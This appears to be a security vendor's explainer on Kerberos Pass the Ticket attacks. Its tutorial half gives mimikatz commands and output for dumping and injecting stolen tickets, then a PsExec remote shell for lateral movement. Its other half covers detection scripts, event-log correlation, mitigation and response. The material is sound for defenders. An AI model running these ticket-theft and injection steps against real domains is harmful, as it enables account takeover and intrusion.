Pass the Ticket Attack
Pass the Ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. Adversaries often use this technique to move laterally through an organization’s network to hunt for opportunities to escalate their privileges or fulfill their mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGTs) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.
Attack Tutorial: How Pass the Ticket Attacks Work
########
# To capture TGTs, this invocation of mimikatz must be run from an elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen and also writes them individually to files
# in the current directory. We have truncated the output to show a single session.
########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session : RemoteInteractive from 4
User Name : joed
Domain : DOMAIN
Logon Server : DC1
Logon Time : 03/07/2020 08:07:58
SID : S-1-5-21-3501040295-3816137123-30697657-1109
* Username : joed
* Domain : DOMAIN.COM
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
Target Name (03) : host ; host.domain.com ; @ DOMAIN.COM
Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
Target Name (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>
The adversary then uses mimikatz.exe kerberos::ptt or a tool with similar capabilities to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources:
PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Server Name : krbtgt/DOMAIN.COM @ DOMAIN.COM
Client Name : joed @ DOMAIN.COM
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS>
A stolen TGS can be used to access only the resource it was issued for, and an adversary can determine that information by inspecting the TGS itself.
To use a stolen TGT, however, the attacker may need to conduct internal reconnaissance to determine what access it provides. This may be as straightforward as querying the user’s group memberships and looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can also use built-in commands like net to discover these details:
PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
User name joed
Full Name Joe Dibley
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/15/2020 3:42:00 PM
Password expires Never
Password changeable 6/16/2020 3:42:00 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/9/2020 6:26:56 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Workstation Administrators *VPNUser
*FileServer1_PublicShare *Domain Users
The command completed successfully.
PS>
In this example, joed is a member of Workstation Administrators, so the injected TGT lets the adversary use a tool such as PsExec to open a remote shell on another workstation:
PS> .\PsExec.exe \\workstation456 powershell.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS> hostname
workstation456
PS>
Detect, Mitigate and Respond
Detection on endpoints
Options include the following:
- Detect the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many endpoint detection and response solutions are capable of this.
- Analyze logged-on sessions for a username mismatch between the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.
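As an added example (not the PowerShell proof-of-concept mentioned above, and not code from the original page), the following Python sketch shows the logic of that endpoint check: it parses a session dump in the format of the sekurlsa::tickets output shown earlier and flags any logon session that holds a Kerberos ticket whose client name is not the session's own user. The dump text, the hostname and every account name other than joed are constructed for the example; the list of built-in sessions that legitimately hold the computer account's tickets is an assumption added to reduce false positives.

```python
import re
from dataclasses import dataclass

# Constructed sample modeled on the sekurlsa::tickets output shown in the tutorial.
# Session 1: legitimate, joed's own session holds joed's TGT.
# Session 2: a different logged-on user (constructed name svc_backup) holds a TGT
#            whose client name is joed, which is what an injected ticket looks like.
# Session 3: LOCAL SERVICE holding the computer account's ticket, which is normal.
SAMPLE_DUMP = """\
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Group 2 - Ticket Granting Ticket
 [00000000]
   Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
   Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )

Authentication Id : 0 ; 999111 (00000000:000f3e47)
Session           : Interactive from 2
User Name         : svc_backup
Domain            : DOMAIN
Group 2 - Ticket Granting Ticket
 [00000000]
   Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
   Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Group 2 - Ticket Granting Ticket
 [00000000]
   Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
   Client Name  (01) : workstation123$ ; @ DOMAIN.COM ( DOMAIN )
"""

SESSION_SPLIT = re.compile(r"^Authentication Id\s*:", re.MULTILINE)
USER_RE = re.compile(r"^User Name\s*:\s*(.+?)\s*$", re.MULTILINE)
CLIENT_RE = re.compile(r"^\s*Client Name\s*\(\d+\)\s*:\s*(\S+)", re.MULTILINE)

# Assumption: these built-in sessions hold tickets for the computer account, not
# for a user of the same name, so they are compared against HOSTNAME$ instead.
BUILTIN_SESSIONS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}


@dataclass
class Session:
    auth_id: str            # "0 ; 31770591 (00000000:01e4c7df)"
    user: str               # the logged-on user of this LSA session
    ticket_clients: list    # client principal of every ticket cached in it


def parse_sessions(dump: str) -> list:
    """Split the dump into logon sessions and pull out user and ticket client names."""
    sessions = []
    for part in SESSION_SPLIT.split(dump)[1:]:
        auth_id = part.split("\n", 1)[0].strip()
        m = USER_RE.search(part)
        user = m.group(1) if m else ""
        sessions.append(Session(auth_id, user, CLIENT_RE.findall(part)))
    return sessions


def find_mismatches(dump: str, hostname: str) -> list:
    """Return (auth_id, session_user, ticket_client) for every ticket whose client
    principal differs from the account that owns the logon session."""
    machine_account = hostname.upper() + "$"
    findings = []
    for s in parse_sessions(dump):
        expected = machine_account if s.user.upper() in BUILTIN_SESSIONS else s.user.upper()
        for client in s.ticket_clients:
            if client.upper() != expected:
                findings.append((s.auth_id, s.user, client))
    return findings


if __name__ == "__main__":
    for auth_id, user, client in find_mismatches(SAMPLE_DUMP, "WORKSTATION123"):
        print(f"session {auth_id}: user {user} holds a ticket for {client}")
```

A production version would enumerate logon sessions through the LSA API (or klist per logon id) rather than parsing text, and would run from a privileged context so that every session is visible; the comparison logic stays the same.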
Detection in Active Directory
Collect and correlate Kerberos events, as follows:
- Develop a ledger that records when and on which endpoint each ticket-granting ticket (TGT) was issued. To do so, audit the following events:
  - ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
  - ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
- Compare each request for a ticket-granting service (TGS) ticket against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. To do so, audit the following events:
  - ‘A Kerberos Service Ticket was requested’ (Event ID 4769)
  - ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
It is not possible to detect the theft and use of a single TGS in Active Directory.
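The ledger correlation described above, as an added Python example that is not part of the original page: it replays constructed 4768, 4769 and 4770 events in time order, records which client address each TGT was issued to, extends that record when the TGT is renewed, and alerts on any TGS request for a user coming from an address that holds no live TGT for that user. The field names (TargetUserName, IpAddress, ServiceName, Status) are those of the Windows Security event data; the event values and the 10-hour lifetime (the default domain Kerberos policy) are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: default Kerberos policy. Set this to the domain's configured TGT lifetime.
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample events, reduced to the fields the correlation needs. In practice they
# come from the Security log of every domain controller, because the 4768 and the 4769 for
# the same TGT may be handled by different DCs, so the ledger must be built across all of them.
SAMPLE_EVENTS = [
    # TGT issued to joed on 10.1.1.50
    {"EventID": 4768, "TimeCreated": "2020-07-09T07:45:44", "TargetUserName": "joed",
     "IpAddress": "::ffff:10.1.1.50", "Status": "0x0"},
    # TGS request from the same endpoint: expected
    {"EventID": 4769, "TimeCreated": "2020-07-09T08:00:00", "TargetUserName": "joed",
     "ServiceName": "host/host.domain.com", "IpAddress": "::ffff:10.1.1.50", "Status": "0x0"},
    # failed TGT request (0x18 = bad pre-authentication): no ticket issued, so not in the ledger
    {"EventID": 4768, "TimeCreated": "2020-07-09T08:30:00", "TargetUserName": "joed",
     "IpAddress": "::ffff:10.1.1.77", "Status": "0x18"},
    # TGS request for joed from an endpoint that never received a TGT for joed: alert
    {"EventID": 4769, "TimeCreated": "2020-07-09T09:10:00", "TargetUserName": "joed",
     "ServiceName": "cifs/fileserver1.domain.com", "IpAddress": "::ffff:10.1.1.77", "Status": "0x0"},
    # TGT renewed from the original endpoint: extends its ledger entry
    {"EventID": 4770, "TimeCreated": "2020-07-09T16:00:00", "TargetUserName": "joed",
     "ServiceName": "krbtgt/DOMAIN.COM", "IpAddress": "::ffff:10.1.1.50", "Status": "0x0"},
    # TGS request after the original expiry but within the renewed lifetime: expected
    {"EventID": 4769, "TimeCreated": "2020-07-09T18:30:00", "TargetUserName": "joed",
     "ServiceName": "ldap/dc1.domain.com", "IpAddress": "::ffff:10.1.1.50", "Status": "0x0"},
]


def normalize_ip(addr: str) -> str:
    """4768/4769 log the client as an IPv4-mapped IPv6 address ('::ffff:10.1.1.50')."""
    return addr[7:] if addr.lower().startswith("::ffff:") else addr


def correlate(events: list):
    """Replay events chronologically. Returns (ledger, alerts) where
    ledger maps user -> [[ip, issued, valid_until], ...] and
    alerts is a list of (time, user, service, ip) for TGS requests with no matching TGT."""
    ledger = defaultdict(list)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev.get("Status", "0x0") != "0x0":
            continue  # failed requests issue no ticket
        user = ev["TargetUserName"].lower()
        ip = normalize_ip(ev["IpAddress"])
        t = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4768:
            ledger[user].append([ip, t, t + TGT_LIFETIME])
        elif ev["EventID"] == 4770 and ev.get("ServiceName", "").lower().startswith("krbtgt/"):
            for entry in ledger[user]:
                if entry[0] == ip and entry[1] <= t <= entry[2]:
                    entry[2] = t + TGT_LIFETIME  # renewal pushes the expiry out
        elif ev["EventID"] == 4769:
            live = any(e[0] == ip and e[1] <= t <= e[2] for e in ledger[user])
            if not live:
                alerts.append((ev["TimeCreated"], user, ev["ServiceName"], ip))
    return ledger, alerts


if __name__ == "__main__":
    _, found = correlate(SAMPLE_EVENTS)
    for when, user, service, ip in found:
        print(f"{when}: TGS for {service} requested as {user} from {ip} with no TGT issued there")
```

Two practical caveats: the ledger is blind to TGTs issued before collection started (expect alerts on the first day and seed the ledger from the previous TGT_LIFETIME of events), and client addresses behind NAT or VPN concentrators will collapse several endpoints onto one IpAddress, which hides mismatches rather than creating false ones.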
Mitigation
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and permit only trusted processes to access it.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Response
- Reset the password of the compromised user account, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
- Reset the password for all users who have logged on to an impacted machine.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
- Activate the incident response process and alert the response team.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.